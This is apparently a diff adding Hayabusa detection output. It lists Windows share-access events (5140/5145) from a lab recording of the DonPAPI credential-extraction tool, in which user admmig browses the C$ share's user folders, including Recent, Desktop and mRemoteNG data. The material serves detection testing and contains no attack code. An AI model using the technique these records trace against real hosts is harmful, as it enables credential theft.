+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.141 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.147 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.149 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.265 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.268 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.270 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
